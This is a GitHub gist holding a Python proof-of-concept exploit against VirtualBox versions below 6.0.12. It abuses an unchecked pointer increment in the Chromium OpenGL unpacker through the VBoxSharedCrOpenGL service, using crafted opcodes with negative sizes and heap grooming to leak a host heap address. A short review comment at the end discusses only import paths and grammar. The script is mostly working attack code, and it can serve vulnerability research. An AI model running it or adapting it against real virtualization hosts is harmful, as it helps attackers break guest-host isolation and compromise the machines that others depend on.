peternguyen93 revised this gist
Sep 18, 2019 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,5 @@ # Author : peternguyen93 import sys sys.path.append('../') # back to vboxlib module -
peternguyen93 created this gist
Sep 18, 2019 .There are no files selected for viewing
@@ -0,0 +1,77 @@ import sys sys.path.append('../') # back to vboxlib module from vboxlib.hgcm import * from vboxlib.chromium import * from ctypes import * ''' Affect VirtualBox version < 6.0.12 ./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h --------------------------------------------------------------------- #define INCR_DATA_PTR( delta ) \ cr_unpackData += (delta) #define INCR_VAR_PTR() \ INCR_DATA_PTR( *((int *) cr_unpackData ) ) --------------------------------------------------------------------- ''' op2 = b'' op2+= pack('<I', 0x28) # size opcode (we control) op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) op2+= pack('<I', 0x1000) # size (n) op2+= b'A'*4 # padding # op1 = pack('<B', CR_EXTEND_OPCODE) op1 = b'' op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) op1+= pack('<II', 48, 64) op1+= b'A'*0x20 msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header msg+= pack('<I', 2) # number of opcode msg+= b'\x00'*2 # padding msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) msg+= op1 msg = msg.ljust(4096, b'X') tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header tmp_msg+= pack('<I', 1) # number of opcode tmp_msg+= b'\x00'*2 # padding tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) tmp_msg+= op1 tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) tmp_msg = tmp_msg.ljust(4096, b'P') client = hgcm_connect('VBoxSharedCrOpenGL') set_version(client) client1 = hgcm_connect('VBoxSharedCrOpenGL') set_version(client1) buf1 = alloc_buf(client, 0x1000, tmp_msg) buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here print('free buf4') msg_dispatch(client, buf4) # free buf4 print('alloc buf4') buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap print('free buf3') msg_dispatch(client, buf3) print('free buf2') 
msg_dispatch(client, buf2) print('execute buf5') res = msg_dispatch(client1, buf5) print(repr(res)[:64]) heap_address = unpack('<Q', res[8:16])[0] print('heap:', hex(heap_address)) hgcm_disconnect(client) hgcm_disconnect(client1)
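Review bot: `sys.path.append('../')` at the top of the hunk is resolved against the process's current working directory, not the script's location, so the following `from vboxlib.hgcm import *` only succeeds when the script is started from its own directory; anchoring on the file is more robust, `sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))` together with `import os`. The three star imports also hide where `pack` and `unpack` come from — neither is exported by `ctypes`, so they are presumably re-exported by one of the vboxlib modules — and an explicit `from struct import pack, unpack` would make that dependency visible and independent of what vboxlib happens to re-export. The module docstring would read more clearly as `Affects VirtualBox versions < 6.0.12` (plural, with the verb agreeing), keeping the stated range as the author gave it.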